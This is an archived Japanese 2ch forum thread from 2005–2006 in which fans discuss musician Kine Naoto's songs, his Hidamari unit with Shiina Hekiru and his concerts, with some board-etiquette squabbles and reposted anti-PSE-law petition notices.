5ちゃんねる ★スマホ版★ ■掲示板に戻る■ 全部 1- 最新50  

■ このスレッドは過去ログ倉庫に格納されています

木根尚登

1 :NO MUSIC NO NAME:2005/11/22(火) 17:14:58 ID:+KrZXKMu
Lifeが意外とよかった。

2 :終了:2005/11/22(火) 17:27:47 ID:FtY0mZZQ

2ゲットできて幸せです。

木根尚登マンセー

3 : ◆756lTYEuqY :2005/11/22(火) 18:58:24 ID:8rfXW4bO
   ┏┳━┳┳━┓┏┓┏━┳┳┳━┓
   ┃┃┃┃┃━┫┃┃┃┃┃┃┃━┫
   ┃  ┃  ┃━┫┃┗┫┃┃┃┃━┫
   ┗━┻━┻━┛┗━┻━┻━┻━┛
   ┏┓  ┏┳┓  ┏┳━━━┳━━━┓
   ┃┃  ┃┃┃  ┃┃┏━━┻━━┓┃
   ┃┗━┛┃┗━┛┃┗━━┳━━┛┃
   ┗━━┓┣━━┓┣━━┓┣━━┓┃
         ┃┃    ┃┣━━┛┣━━┛┃
         ┗┛    ┗┻━━━┻━━━┛


4 :NO MUSIC NO NAME:2005/11/23(水) 10:51:44 ID:ckasN78T
age

5 :NO MUSIC NO NAME:2005/11/25(金) 12:18:27 ID:I1JAOW10
だんだんクセが強くなる歌声も、ありかなって思えるようになってきた。

6 :NO MUSIC NO NAME:2005/11/25(金) 12:27:26 ID:S1ry0c11
6だったら全身白タイツで登場してやる

7 :NO MUSIC NO NAME:2005/11/25(金) 22:49:54 ID:r7k6GWeG
MY BEST FRIENDがめちゃめちゃかっこええ。

8 :NO MUSIC NO NAME:2005/11/25(金) 23:32:20 ID:gtEEBoYO
今度職場の近所で無料ライブやる

9 :NO MUSIC NO NAME:2005/11/26(土) 18:21:52 ID:n0zTkYuK
白タイツやれよ

10 :NO MUSIC NO NAME:2005/11/28(月) 00:15:21 ID:jurROSsO
>8と>9のIDが意外と面白い件について

無料イベント、帰り際のファンに手を振って歩き 振り返ってまた手を振る姿に好感度UP

11 :NO MUSIC NO NAME:2005/11/28(月) 20:07:12 ID:paJ2LyKR
あの時最後のつもりで抱いた切ないキスの、言葉にならない約束
今も覚えているかい?

12 :NO MUSIC NO NAME:2005/12/03(土) 23:00:20 ID:4TVkiUge
ttp://www.diskgarage.com/play/00052846.html

13 :NO MUSIC NO NAME:2005/12/06(火) 09:14:34 ID:2aNPGk0H
 

14 :NO MUSIC NO NAME:2005/12/16(金) 13:28:17 ID:9w99wtVc
今日のライブって渋谷の何と言う名前の場所でしたっけ?

15 :NO MUSIC NO NAME:2005/12/16(金) 18:57:35 ID:9w99wtVc
14です。何とかたどり着き当日券を確保しました。間もなくトークライブが始まります!

16 :NO MUSIC NO NAME:2005/12/25(日) 13:16:09 ID:GvCf/I6M
今日はtohkoのライブにゲストだっけ?


17 :NO MUSIC NO NAME:2005/12/25(日) 17:50:56 ID:Z+xgqBCS
tohkoってまだ歌手やってたの?

18 :NO MUSIC NO NAME:2005/12/26(月) 00:31:27 ID:7cjHcnKC
http://music5.2ch.net/test/read.cgi/musicjf/1135484097/l50

19 :NO MUSIC NO NAME:2005/12/27(火) 22:29:32 ID:PoOyfmIQ
木根の唄はやさしい

20 :NO MUSIC NO NAME:2005/12/30(金) 13:09:33 ID:uSg527J4
杵の才能に感服!
名盤はリキッドサン

21 :名無しの歌姫:2006/01/07(土) 11:19:49 ID:K9A1HrIA
日置明子(漢字忘れた)さんはいまいずこ?

22 :NO MUSIC NO NAME:2006/01/07(土) 22:03:59 ID:skS68HMd
>>21

彼女はとっくに引退しているよ。

23 :名無しの歌姫:2006/01/08(日) 14:48:15 ID:aR+1jHrW
葛城哲也とコンビ組めよ

24 :NO MUSIC NO NAME:2006/01/12(木) 17:44:00 ID:xVYZKQzL
つうか、TMで一番の成功者だろ?

25 :NO MUSIC NO NAME:2006/01/13(金) 01:57:47 ID:AY6oLWEm
ttp://2chart.fc2web.com/2chart/inotihattekkara.html
木根さん!

26 :NO MUSIC NO NAME:2006/01/14(土) 12:30:39 ID:RjZILIsB
玄人志向の方が似てる

27 :名無しの歌姫:2006/01/15(日) 13:55:39 ID:yA2nN+vB
木根さんって結婚してるのか_?

28 :NO MUSIC NO NAME:2006/01/17(火) 20:09:14 ID:JEkq04pS
>>27
自身ウツに薦めてるからしてんじゃない?


29 :NO MUSIC NO NAME:2006/01/19(木) 00:23:22 ID:z52PwXnx
「毎日 目覚めるたびに心に風 フォー」って聞こえるのは俺だけですか?
我言良朝

30 :NO MUSIC NO NAME:2006/01/19(木) 19:53:28 ID:gp2uo0v/
一体いくつくらいサングラスを所有してんだろう?

31 :NO MUSIC NO NAME:2006/01/25(水) 19:46:36 ID:q4WANn8U
まだ厚木に住んでんの?

32 :NO MUSIC NO NAME:2006/01/28(土) 05:23:17 ID:T8ZxRyOw
創価


33 :NO MUSIC NO NAME:2006/02/04(土) 01:02:35 ID:H4beh1BX
結婚して高校生くらいの娘さんがいるよね。
木根さんて厚木にすんでるの?

34 :名無しの歌姫:2006/02/05(日) 19:02:48 ID:hg2z7gGr
娘もサングラスなのか?

35 :NO MUSIC NO NAME:2006/02/05(日) 22:00:12 ID:fYJf5j+p
この人はTMが無くても、ウツとのコンビで世に出てこれたのだろうか。
何かそれも見てみたい気もするが。

36 :NO MUSIC NO NAME:2006/02/06(月) 00:30:50 ID:pKoN/HRX
スキマスイッチみたい

37 :NO MUSIC NO NAME:2006/02/06(月) 13:20:48 ID:ZlNjoKtt
ああ、アフロだったしな…

38 :NO MUSIC NO NAME:2006/02/07(火) 01:25:39 ID:/uvHH1e5
ボーカル、犬顔だし。

39 :NO MUSIC NO NAME:2006/02/19(日) 18:36:02 ID:GoCwH5cV
>>21
海老蔵の子どもと一緒にひっそりと暮らしておる

40 :NO MUSIC NO NAME:2006/02/19(日) 18:55:40 ID:Iddh4a2i
>>35 尚登と隆。

41 :NO MUSIC NO NAME:2006/02/20(月) 01:33:42 ID:+0INCNQp
ソロもいいけど、ユニットも何かやって欲しいな。

42 :NO MUSIC NO NAME:2006/02/20(月) 12:41:17 ID:su1BcRVx
そうね。テツヤとタカシとの3人組みがいいね

43 :NO MUSIC NO NAME:2006/02/22(水) 22:04:03 ID:Rj9HIQH9
三人組はパスの方向で…
二人組がいい

44 :NO MUSIC NO NAME:2006/02/23(木) 01:02:42 ID:Yp4zW2lk
木根さんの曲にはウツの声が一番合うんだよな。
もともと大ヒット狙うポジションでも無いし、一緒に細々と出来ないものか。

それか思いつきだが渡辺美里と組んでも面白そう

45 :NO MUSIC NO NAME:2006/02/24(金) 10:07:10 ID:qqETyqCl
美里にはひっそりと曲提供し続けている
本当に鬱とユニット組んでくれないものか

46 :NO MUSIC NO NAME:2006/02/26(日) 19:38:51 ID:grjshit6
作曲:木根/編曲:浅倉のコンビ希望。あてのない闇なんて、今だにご飯何杯でもイケる。

47 :NO MUSIC NO NAME:2006/02/27(月) 16:34:05 ID:h9Un0BOD
泣かないで〜♪泣かないで〜♪涙はもう星に変えて〜♪

48 :NO MUSIC NO NAME:2006/02/27(月) 17:45:25 ID:NofRkQpu
H2Oの鬱杵ハモりは最高だ。

49 :NO MUSIC NO NAME:2006/02/27(月) 23:10:21 ID:ya4gXm/K
 

50 :NO MUSIC NO NAME:2006/02/27(月) 23:31:42 ID:jM24AIN7
まだまだ需要は十分有ると思うんだけどね。

51 :NO MUSIC NO NAME:2006/02/28(火) 09:37:42 ID:X2pNPRPW
FANKS CRY-MAXのステージで
メンバー全員の顔が木根、という夢を見た。
疲れてるのかな俺。。。

52 :NO MUSIC NO NAME:2006/02/28(火) 18:00:51 ID:f3XPkKmd
優先金振り込んで北。正直GWど真ん中開催もスケ調整吉祥寺でやるのやめいだが…なんとか一日明けたよ。

53 :NO MUSIC NO NAME:2006/03/01(水) 21:42:47 ID:/W/zjfvX
>51
DDファイナルの出演者が全員木根さんっていう夢を見た。もちろんゲストのTAKもなぜか木根さん…。ギターの上手さに違和感を感じつつ、ありえねーだろと会場を見渡したら…客もスタッフも木根さんだった。まさか、と思いつつ顔に手をやると…自分も…という所で目が覚めた。

54 :NO MUSIC NO NAME:2006/03/01(水) 23:43:42 ID:R0M7yH5R
http://music5.2ch.net/test/read.cgi/musicjg/1140105293/583
> 名前:名無しさん@お腹いっぱい。[sage] 投稿日:2006/03/01(水) 23:27:48 ID:W7DXjgpLO
>二時からリズレツアーを全曲流します。
>五時からは未発売曲や小室デモを流します。
>クイズは無しにしますので
>決して口外なさらないでください。
>権利とか恐いので…

55 :NO MUSIC NO NAME:2006/03/02(木) 10:42:21 ID:qZuXAMGG
玄人志向sage

56 :NO MUSIC NO NAME:2006/03/03(金) 23:04:09 ID:r1b5/jjn
杵タンレギュラーのテレビ決まりましたね
月一回だとあんまり見れないからつまらないような
杵タンの負担にならなくてよかったような微妙なかんじw

あの番組は鬱が昔がゲストしたことがあるけど
杵タンが司会ならまた来てくれそうで楽しみ(*´∀`*)


57 :NO MUSIC NO NAME:2006/03/04(土) 23:22:38 ID:+/NP6n4Y
君は今何処にいるのー

58 :NO MUSIC NO NAME:2006/03/05(日) 12:01:01 ID:nNLd5Ic2
>>56
うち見れない地域・゜・(ノД`)・゜・
FCサイトで毎回収録レポしてくれないかな

59 :名無しの歌姫:2006/03/05(日) 13:04:16 ID:0meg91Ci
TMでギター弾いてたけどちゃんとスピーカーから音は出てたのだろうか?

60 :NO MUSIC NO NAME:2006/03/05(日) 19:20:51 ID:8YEPyDil
TM以外だと

CHRISTMAS CHORUS(小室哲哉)
I WISH(渡辺美里)

で木根さんのアコギは聞けるね。

61 :NO MUSIC NO NAME:2006/03/05(日) 19:30:08 ID:nys3tXIu
>>58
会員サイトで写メ日記程度にはありそうですね。
私も放送されない地域だから(´・ω・`)ショボーン

限定ユニットはへきるさんとなのですね。
GWまで生旦那お預けと思っていたら来月会えますね。

62 :NO MUSIC NO NAME:2006/03/05(日) 20:33:41 ID:3qwIVIH6
木根さんともう一人は私の小、中学校の先輩らしく、うちの裏に住んでたらしい。

63 :NO MUSIC NO NAME:2006/03/06(月) 20:40:06 ID:ZI5JG2xP
>>61
ひだまりというからにはフォーク系男女デュオ?
ダンナのオリジナル曲なのか誰かのカバーなのか気になります〜
森口さんとのコラボはフォーマルだけど
へきるさんと二人のときはどんな服で現れるのかな(*´∀`*)

64 :NO MUSIC NO NAME:2006/03/06(月) 22:40:23 ID:+1vDo0gh
★新規
発売予定日:2006/04/26
タイトル :ひだまり Size Up
声優   :椎名へきる
品番   :SRCL6252
価格   :\1,223
------------------------------------------------------------
椎名へきる・木根尚登のユニットのCD?
------------------------------------------------------------
ttp://www.animate-shop.jp/webshop70/commodity_param/ctc/cd/shc/0/cmc/4040552/

もういっちょ追加
ttp://www.diskgarage.com/play/00053193.html



65 :NO MUSIC NO NAME:2006/03/07(火) 19:29:34 ID:8gTyLfys
TMのライブCD聴いてるけどほとんどギターの音が聞こえない・・・
カツジーとかマッチャんのソロは別として。

66 :NO MUSIC NO NAME:2006/03/07(火) 19:39:10 ID:ytbIb18a
>>64
シングルでるんですね?
じゃあダンナのオリジナルかな?
楽しみになってきました(*´∀`*)
初回特典ステッカーも気になる・・・

67 :NO MUSIC NO NAME:2006/03/07(火) 23:42:27 ID:THSA2tmf
そういえば仕事始めって日記に書いてたのこれかな?


68 :NO MUSIC NO NAME:2006/03/08(水) 19:58:00 ID:Ixnv6HV7
木根さんと椎名さんはまだ交流があって、多分みっこさんや美里の次に木根ファミリーになるのではないかと…。こえだめの曲早く聞いてみたいなあ。

69 :NO MUSIC NO NAME:2006/03/08(水) 21:07:00 ID:yeOyK8BG
>>68
多分そこまでは行かんよ。
4連続リリースでコンビ組んだ当初(2001年秋〜)はともかく、
今は一歩引いた形になってるし、
どっちかと言えば元プリプリの人と仕事してる方が多い。

70 :NO MUSIC NO NAME:2006/03/08(水) 21:07:26 ID:q4zy+VjP
>>65
TMN以前は特に特に聞こえにくい。
TM再活動後のDVDだとそれまでに比べてよく聞こえる。
Double-Decadeだとギターソロもあるし。
つーことでキーボードの木根ならMajor

ライブCDやDVDって音いじってるし。
TMのFanks The Live3 CAMP FANKS'89とCAROL The Liveを
比べるとどの音を削ってるかよく分かる。

そういや木根の活躍が見れるDVDってソロだと1枚しかないのな。
トークがあってこそって言うのかもしれんがライブ盤好きな漏れとしては…。

71 :NO MUSIC NO NAME:2006/03/08(水) 21:08:54 ID:q4zy+VjP
修正中に送っちゃった。
つーことでキーボードの木根ならMajor Turn Round 1のDVD
ギターならDouble DecadeのDVD。


72 :NO MUSIC NO NAME:2006/03/09(木) 00:53:00 ID:KivYmGe9
TM関係の話はこちらでどうぞ♪
【ダンナ様】ミュージシャン木根尚登vol,2【がんがって】
http://music5.2ch.net/test/read.cgi/musicj/1133878941/

73 :NO MUSIC NO NAME:2006/03/09(木) 19:43:38 ID:ZN7gc1LA
ダンナ甘いもの断ちしたんですね
野音にはバレンタインの分までおいしいチョコを
持っていこうと思っていたのでちょっと残念・・・
たばこもやめちゃったしお酒は元々あまり飲まないし
ダンナそんなにストイックにならなくてもいいのにな(´・ω・`)
ちょっと心配



74 :NO MUSIC NO NAME:2006/03/09(木) 20:03:50 ID:ZkcLj34W
>>72
そんな堅いこと言うなよ。

75 :NO MUSIC NO NAME:2006/03/09(木) 20:53:30 ID:6ndRwICE
どっちみちどっちの板のキネスレも、
ひだまり関連で当分荒れそうな気配が。

来週末のお台場、相方さんのピンライブでダンナが来て
ユニットとして初お目見えするらしいね〜。

76 :NO MUSIC NO NAME:2006/03/09(木) 21:06:56 ID:ZkcLj34W
>>75
オフィにはまだ乗ってないね。

漏れはへきるのCDはスルーしてたわけだが…。
どんな曲調になるのかねぇ。ちと心配。

ライブを一緒にやってた森口とユニットってのもありだよな。
そっちもやる機会があればやってホスィ。
新曲じゃなくてもいいかなぁって思ったりして。

77 :NO MUSIC NO NAME:2006/03/09(木) 21:21:28 ID:GQJ9yGqU
>>74
二個あるんだから住み分けしましょ
お互い嫌な思いしたくないでしょ
ひだまりで荒れてるってここじゃないでしょ
また揉め事持ち込まないで下さい

78 :NO MUSIC NO NAME:2006/03/09(木) 21:31:01 ID:6ndRwICE
>>76
相方さんの公認携帯サイトでコメントあったらしい。
「特別な事」をやるとだけ言ってるんだけど、
多分ひだまりのお披露目と思って良いかと。

79 :NO MUSIC NO NAME:2006/03/09(木) 21:32:55 ID:6ndRwICE
>>76
これも貼っておくので参考に
ttp://www.sonymusicshop.jp/detail.asp?goods=SRCL000006252


80 :NO MUSIC NO NAME:2006/03/09(木) 22:28:53 ID:ulW+TzQk
TMも杵の仕事なんだから文句いうな嫌うな
というくせにひだまりは総攻撃な人達苦手です

81 :NO MUSIC NO NAME:2006/03/09(木) 22:33:46 ID:6ndRwICE
>>80
TMNは木根尚登の存在証明ですから。
冷静に考えるとやっぱ今回の仕事は
ちょっとおかしいよって思うのも当然だと

82 :NO MUSIC NO NAME:2006/03/09(木) 22:44:12 ID:ulW+TzQk
>>81
TMNは木根尚登の存在証明⇒TMスレか邦楽杵スレ
杵タン杵タン杵タン⇒邦楽男性ソロ杵スレ

でよろしいんじゃないですか

83 :NO MUSIC NO NAME:2006/03/09(木) 23:13:08 ID:UzUjrJuy
ずーっと一緒に仕事して来たのだから、そろそろ一緒にユニットでも…ってことに
なるのは自然な流れだと思っていました
TMが解散してからの旦那はTMファンにとっては存在も証明できないのか…orz
相容れないのだなと実感しました

84 :NO MUSIC NO NAME:2006/03/09(木) 23:15:48 ID:6ndRwICE
>>83
そんな流れには決してならないならないってw


85 :NO MUSIC NO NAME:2006/03/09(木) 23:41:14 ID:/CIo2FGN
>>77
∩( ´Α`)< 先生、質問でつ。
         WinterComesAroundはどのスレが適切でつか?
         バナナはおやつでつか?
         「下さい」って2ちゃんねるっぽくなqあwせdrっftgyふじこlp;@:「」!

86 :NO MUSIC NO NAME:2006/03/09(木) 23:47:45 ID:/CIo2FGN
>>83
>ずーっと一緒に仕事して来たのだから、そろそろ一緒にユニットでも…

えっと、森口やサポートの人たちって…。

あんまり気にするな。気にすると余計ネタにされるぞ。
TMファンの"中には"そういう奴もいるんだろうけどな。
tukaそもそも"存在証明ってなんじゃい(W"って話だろ。

87 :NO MUSIC NO NAME:2006/03/09(木) 23:59:03 ID:37moUa6m
まあひだまりのネタに関しては、肯定的になれって言う方がおかしい。
木根の関係者やソニーにまともな判断下せる人は居なかったのかとorz

88 :NO MUSIC NO NAME:2006/03/10(金) 00:02:35 ID:gGqOLiN0
>>87
同意。

89 :NO MUSIC NO NAME:2006/03/10(金) 00:05:41 ID:BMcBX6K8
>>87
素朴な疑問だが…肯定的になれないのはなんでよ?
へきるが声優さんだから?ほかに適切な人がいると思うから?
まぁ漏れも大歓迎ではないが…。まぁ微妙ってカンジ?

>>77
∩( ´Α`)< 先生、僕も質問です。
         TMってユニットのネタはダメだけど
         ひだまりってユニットはユニットだけどソロ扱いでOKでつか?

90 :NO MUSIC NO NAME:2006/03/10(金) 00:09:26 ID:gGqOLiN0
>>89
森口が居るのになんで?って事が有るからでは?
あん人確かツアーも平行してやってんのに
こんなユニットやってる余裕ぶっこけるんだなと。

あとひだまりは4月一杯までの限定なので
ネタに触れないでスルーっつう対処の仕方もおk。

91 :NO MUSIC NO NAME:2006/03/10(金) 00:20:51 ID:BMcBX6K8
>>90
あぁそれでか>森口
うーん、漏れも森口の方がよさげって感じなんだよな。
漏れはライブ行かないしCDの1曲しか聴いてないけど、森口と組めば結構
いいんじゃないのって思ったもんなぁ。

このユニットって企画ものだろうか?で、へきるファソにはどんな塩梅かね?

92 :NO MUSIC NO NAME:2006/03/10(金) 00:25:07 ID:gGqOLiN0
>>91
向こうの本スレ見てきなよ。
オイラは興味ないから見ない。

個人的にはもうここまで来たら
森口とトコd全国ドサ周りやって欲しいんだよなw
鬱とは年一で気ままなライブやってさ。

93 :NO MUSIC NO NAME:2006/03/10(金) 00:35:24 ID:BMcBX6K8
>>92
ドサ周りだけじゃなくてCDもきぼんぬ。

94 :NO MUSIC NO NAME:2006/03/10(金) 02:02:46 ID:7palQoJb
>>92
普通にニューリリースはうれしいお

杵さんの曲はremenber me?が好きです。

95 :NO MUSIC NO NAME:2006/03/10(金) 02:04:02 ID:7palQoJb
まちがえた>>91だったorz



96 :NO MUSIC NO NAME:2006/03/10(金) 18:27:39 ID:hMMf7MGt
kinetti

97 :NO MUSIC NO NAME:2006/03/10(金) 19:54:53 ID:03gwjwm4
キリンラガービールのCMに木根さんが出てる…と思ってよく見たら、寺尾聰だった…orz

98 :NO MUSIC NO NAME:2006/03/11(土) 10:16:33 ID:Z9IB1WEi
いつの間にか入れ替わる予定
ルビーの指環も練習中

99 :NO MUSIC NO NAME:2006/03/11(土) 17:06:19 ID:7ZWTqVQl
どうせ出るならSTILL LOVE HERあたり歌って欲しいな

100 :NO MUSIC NO NAME:2006/03/12(日) 19:36:59 ID:QgT28vsE
●∀●木根さんに萌えるスレ●_●
http://music5.2ch.net/test/read.cgi/mjsaloon/1142159771/

101 :NO MUSIC NO NAME:2006/03/15(水) 18:38:52 ID:naLmOa56
あてのない闇は最高。浅倉大介のアレンジだけどさ。根本的にこの人のバラードはもはや神です。さすがは「キネバラ」

102 :NO MUSIC NO NAME:2006/03/16(木) 22:48:41 ID:cfmTDAL2
>101
確かにあて闇は名曲ですな。木根大介のコンビは意外と合ってるかも。木村油姫のとか。レヴェランスのやっつけ感(アレンジが)はちょっとアレだけど、両ヲタとしてはまあ、一緒に作業してくれるのは嬉しい限りです。

103 :NO MUSIC NO NAME:2006/03/21(火) 02:21:54 ID:CcAggVfv
そういやへきるが歌手デビューした頃のアルバムのアンケートはがきに
「木根尚登氏の楽曲でなんかやってほしい」みたいな事書いたの思い出した。
もう何年前のことだったか…

スレ汚しスマソ

104 :NO MUSIC NO NAME:2006/03/23(木) 15:31:30 ID:jzxakDQu
木根尚登も反対しているPSE法。
音楽ファンのみなさんも、反対運動にご協力お願いします。
(2ch検索で「PSE」で検索かければ、たくさんのスレが出てきます。デモや署名活動などが全国各地で行われていますのでよろしくお願いします。)
http://www.mpn.gr.jp/cgi-bin/relation/relation.cgi

2006年4月1日に「電気用品安全法」の猶予期間が終了するにあたり、
中古品が規制の対象となることについて、貴省による立法時の十分な説明及び
法制定後の十分な周知が行われなかった結果、様々な混乱が起きている点に鑑みて、
2001年以前に製造された、PSEマークの付いていないすべての中古もしくは
新古電気製品については、販売時もしくは出荷時の安全規格等(国外規格等も含む)に
準拠しているものであれば、それを根拠として電気用品安全法の規制の対象としないよう、
同法を改正するなど、混乱を収拾できる抜本的な対策を早急に措置されることを要望します。

【発起人】
坂本龍一 細野晴臣 高橋幸宏 松武秀樹 椎名和夫
【賛同者】
浅倉大介、アンジェラ・アキ、伊藤大助 (クラムボン)、宇都宮隆、
エイジアエンジニア、m-flo、大友良英、おおはた雄一、尾崎亜美、小原 礼、
小山田圭吾、木根尚登、Caravan、杏子、桑原茂一、COIL、小坂明子、
小林武史、小室哲哉、今剛、サエキけんぞう、Shinnosuke(SOUL'd OUT)、
スガシカオ、スキマスイッチ、高木正勝、テイ・トウワ、DJ KENTARO、
東京スカパラダイスオーケストラ、東儀秀樹、土橋安騎夫、中西康晴、
中村哲、西山 毅(HOUND DOG)、難波正司、野村義男、元ちとせ、
畠山美由紀、原田郁子(クラムボン)、Face 2 fAKE、ミト(クラムボン)、
向谷 実、山崎まさよし、ヤマタカEYE、吉田美奈子、RAM RIDER、LISA、RYO the SKYWALKER(50音順)


105 :NO MUSIC NO NAME:2006/03/23(木) 16:43:49 ID:jzxakDQu
【大阪御堂筋、四ツ橋筋でサウンドデモ!】

街のど真ん中をクラブにします。
普段クラブに行く人もそうでない人も、
反PSEの人もそんなに知らない人も、
音楽機材にこだわる人もそうでない人も、
中古家電の規制に怒っている人もあんま関係ないと思ってる人も、
環境問題に取り組んでる人もその辺にごみ捨てる人も、
家計を預かる奥様方も貧乏な自分に酔える学生も
日常の空間が、国に、経産省の役人に、犯されようとしていることに納得いかない人は、

2006.3.25 (Sat) 16:00三角公園集合 16:15出発
Come here !!!!!!!! 
アメ村三角公園→御堂筋(大丸そごう前)→難波(高島屋前)→四ツ橋筋→堀江公園 

音は、70年代、80年代、90年代、機材の実験とともに歩んできたダンス・ミュージック全てです。
人間と機械の融合を果たしてきた音楽全てです。
機材なしに音楽はありえない。生活はありえない。快楽はありえない。

106 :NO MUSIC NO NAME:2006/03/23(木) 19:07:45 ID:040dTsTh
★【東京】電気用品安全法(PSE法)反対OFF in 東京
(東京地区のOFFスレ別館)
http://off3.2ch.net/test/read.cgi/offmatrix/1142502007/

その他、署名が3月27日まで!!!
http://sound.jp/pse/

107 :NO MUSIC NO NAME:2006/03/25(土) 00:07:37 ID:vyCOcy+K
誰か森口博子とダンナのライブは行ったかな?

108 :NO MUSIC NO NAME:2006/03/27(月) 22:49:26 ID:B3W6UX+t
誰も見てないの??

109 : ◆AXS/10c6xk :2006/03/30(木) 01:54:56 ID:DHF4jHU/
エアメールよくね?

110 :NO MUSIC NO NAME:2006/03/30(木) 14:20:09 ID:cGek/+5U
107〜109は何か同一人物に思える。だが旦那と森口博子のライブは見てないので解らない。

111 : ◆AXS/10c6xk :2006/03/30(木) 17:21:48 ID:DHF4jHU/
109だけ俺だお

112 :◇AXS/10c6xk:2006/04/02(日) 03:46:24 ID:z/r5Mcd9


113 : ◆TM.HP9pN8Y :2006/04/02(日) 13:30:01 ID:Zf/77tkW
ノシ

114 :NO MUSIC NO NAME:2006/04/03(月) 11:56:02 ID:OFKOxWFy
大地の物語

115 :NO MUSIC NO NAME:2006/04/05(水) 23:52:49 ID:4giMYYzg
今週の日曜、日比谷野音に出るね!

116 :NO MUSIC NO NAME:2006/04/06(木) 00:23:27 ID:7qOFmevR
おう

117 :NO MUSIC NO NAME:2006/04/06(木) 08:58:18 ID:TYKDh/Es
旦那最近CD出さないのかなあ?

118 :NO MUSIC NO NAME:2006/04/10(月) 00:19:34 ID:GuLoCvlF
野音行ったよー。ひだまり好きかも。

119 :NO MUSIC NO NAME:2006/04/12(水) 02:17:20 ID:05pwQu1/
ひだまり?

120 :NO MUSIC NO NAME:2006/04/12(水) 11:23:57 ID:KHWqP77R
ここは「ソロ板」。
OK?

121 :NO MUSIC NO NAME:2006/04/12(水) 23:10:39 ID:xpXU4t9i
木根タンの活動全般語りは 邦楽・木根スレにカモン

122 :NO MUSIC NO NAME:2006/04/15(土) 23:19:30 ID:l/agcUy1
ひだまりは売っているのかい?

123 :NO MUSIC NO NAME:2006/04/15(土) 23:46:49 ID:0oq3U/yS
>>122
26日シングル発売

124 :NO MUSIC NO NAME:2006/04/16(日) 02:47:55 ID:6yDdHOuf
私はライブ行くよん

125 :NO MUSIC NO NAME:2006/04/16(日) 08:08:59 ID:ACpeK8IP
木根氏の活動「全般」語りは 邦楽・木根スレにカモン
ここはソロ板。OK?

126 :NO MUSIC NO NAME:2006/04/16(日) 22:29:36 ID:ILYwgdQg
今日へきるのCDを買いに行ったのだが、正直その曲をTMNでやってくれと思ったくらい良かった。

127 :NO MUSIC NO NAME:2006/04/17(月) 07:23:49 ID:SLH/OA3n
ここソロ板。何回言えば判んの?

128 :NO MUSIC NO NAME:2006/04/17(月) 23:02:41 ID:Ast4IWES
ブロデュースの話もダメなのか。

129 :NO MUSIC NO NAME:2006/04/17(月) 23:23:57 ID:yusvc0et
ダメです。木根尚登としての活動のみがこの板での限定範囲内。
他人が少しでも絡む話は邦楽板でどうぞ。

130 :NO MUSIC NO NAME:2006/04/18(火) 01:32:48 ID:fhli4d1m
え?何かそれはさみしいような気がするのですが、、、
向こうは女性の嫉妬が渦巻いててギスギスしてて恐いんですよ〜

131 :NO MUSIC NO NAME:2006/04/18(火) 02:03:13 ID:woDVIy3v
ここも十分ギスギスしていると思う。

132 :NO MUSIC NO NAME:2006/04/18(火) 02:13:05 ID:fhli4d1m
森口さんのファンって学会の人達なんですか?恐いですね〜
あれが同じファンならもっと嫌だな〜

133 :NO MUSIC NO NAME:2006/04/18(火) 09:03:50 ID:kXlZaQKv
別にいいじゃねえかよ!他人が絡もうが旦那の事を語ってる事だし……。そもそもお前は何様だ?

134 :NO MUSIC NO NAME:2006/04/18(火) 09:27:36 ID:Gi8DYys1











135 :NO MUSIC NO NAME:2006/04/18(火) 15:59:50 ID:C18w9UqM
糞スレ

136 :NO MUSIC NO NAME:2006/04/18(火) 20:57:41 ID:kXlZaQKv
杵と鬱の二人だけでいいから活動してほしいなあ。

137 :NO MUSIC NO NAME:2006/04/18(火) 21:05:17 ID:eUowagqC











138 :NO MUSIC NO NAME:2006/04/18(火) 21:07:46 ID:eMWzAg/r
鬱は良いだろ。

139 :NO MUSIC NO NAME:2006/04/19(水) 00:34:48 ID:TMsq2RhC
ぶっちゃけ森口大嫌い!でしゃばり女ウザイ

140 :NO MUSIC NO NAME:2006/04/19(水) 19:28:07 ID:gwx7nzPl
杵また何か小説書いてくれないかなあ〜〜。それか何か曲書いてくれないかなあ〜〜。

141 :NO MUSIC NO NAME:2006/04/21(金) 07:48:44 ID:WZVUU49I
ひだまりだめならU波もアウトだろ

って記念日にギスギスしたかねー

142 :NO MUSIC NO NAME:2006/04/21(金) 18:22:00 ID:Kq6Jqg9f
そう今日は大事な記念日……なので杵頑張れ!!!!!

143 :NO MUSIC NO NAME:2006/04/24(月) 20:48:09 ID:azZluogD
延びないなこのスレ

144 :NO MUSIC NO NAME:2006/04/24(月) 22:55:34 ID:mz7L0DAp
5Daysライブまでもう少し空いてるからな。

145 :NO MUSIC NO NAME:2006/04/25(火) 20:18:22 ID:bLWwcdZC
すこ〜し前に、新宿伊勢丹の前ですれ違ったw
お一人でした。オーラ無しorz

146 :NO MUSIC NO NAME:2006/04/27(木) 12:23:08 ID:z41d2VNC
たまにこの人犬連れて散歩してない…?

147 :NO MUSIC NO NAME:2006/04/28(金) 08:04:05 ID:XjzkLRlD
こっちは荒れてなくて良かった。

148 :NO MUSIC NO NAME:2006/04/28(金) 13:20:31 ID:4HtAS07m
昨日の読売新聞に載っていた訳だが…

149 :NO MUSIC NO NAME:2006/04/29(土) 12:46:35 ID:o9Mu05pp
杵は層化について触れる時は、それと分かるように
サングラスを外してくれると有難い。
アーティスト杵でなく、儲杵だと思えるから。

150 :NO MUSIC NO NAME:2006/04/29(土) 21:02:34 ID:AReX08sY
アンタもしつこいね〜w
自演に必死すぎで笑えるんですけど〜www


151 :NO MUSIC NO NAME:2006/05/01(月) 10:34:58 ID:/FdtdG3q
ここでは層化話禁止だろ。

152 :NO MUSIC NO NAME:2006/05/01(月) 21:35:50 ID:3AljReVD
なんだかんだ言ってもチケット完売だしw

153 :NO MUSIC NO NAME:2006/05/02(火) 10:32:57 ID:WbLsMTo/
んで一曲も知らないジジババが大量に来るんでしょ。

154 :NO MUSIC NO NAME:2006/05/02(火) 22:45:48 ID:8xC3pAvy
曲も知らない人チケ買わない→アナタあちこち木根ぎらいを新とか文とか糞週刊誌なみに書きまくってる暇人デショ嫌いなら鹿とで書き込む必要なしじゃ

155 :NO MUSIC NO NAME:2006/05/03(水) 00:35:10 ID:QK6mLLa4
>>154

負け犬の遠吠えw


156 :NO MUSIC NO NAME:2006/05/03(水) 00:37:18 ID:QK6mLLa4
>>153

人生に負けた社会のゴミw


157 :NO MUSIC NO NAME:2006/05/03(水) 17:12:53 ID:SqrFXiiv
MUMIX Radio聴いてるヤシいないの?


158 :NO MUSIC NO NAME:2006/05/04(木) 02:28:51 ID:zoZc8uDj
で、ライブのレポよろしく!

159 :NO MUSIC NO NAME:2006/05/04(木) 03:18:21 ID:bKCD+53b
何やったんだろう???

160 :NO MUSIC NO NAME:2006/05/05(金) 00:17:17 ID:f4oJsU7q
I Say Goodmonig
Hello, Mr Alone
ONE DAY AND NEW DAY
